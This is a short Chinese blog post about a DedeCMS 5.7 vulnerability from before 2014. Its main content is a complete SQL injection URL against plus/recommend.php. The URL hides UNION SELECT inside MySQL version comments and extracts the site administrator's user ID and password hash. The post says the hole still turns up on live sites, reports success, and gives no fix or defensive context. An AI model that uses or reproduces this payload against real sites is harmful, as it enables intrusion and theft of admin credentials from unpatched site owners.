【摘要】虽然漏洞有点久远了,但有的时候还能遇见...http://www.dyboy.cn/plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\'ormid=@`\'`/*!50000union*//*!50000s...
虽然漏洞有点久远了,但有的时候还能遇见...
http://www.dyboy.cn/plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\' or mid=@`\'` /*!50000union*//*!50000select*/1,2,3,(select CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin` limit+0,1),5,6,7,8,9%23@`\'`+&_FILES[type][name]=1.jpg&_FILES[type] [type]=application/octet-stream&_FILES[type][size]=111
成功如图:
未经允许不得转载:第一资源网 » DedeCMS 20140201 之前的5.7通杀漏洞
小东
简介:专业团队网站开发、安全运维,合作意向请联系!
发表评论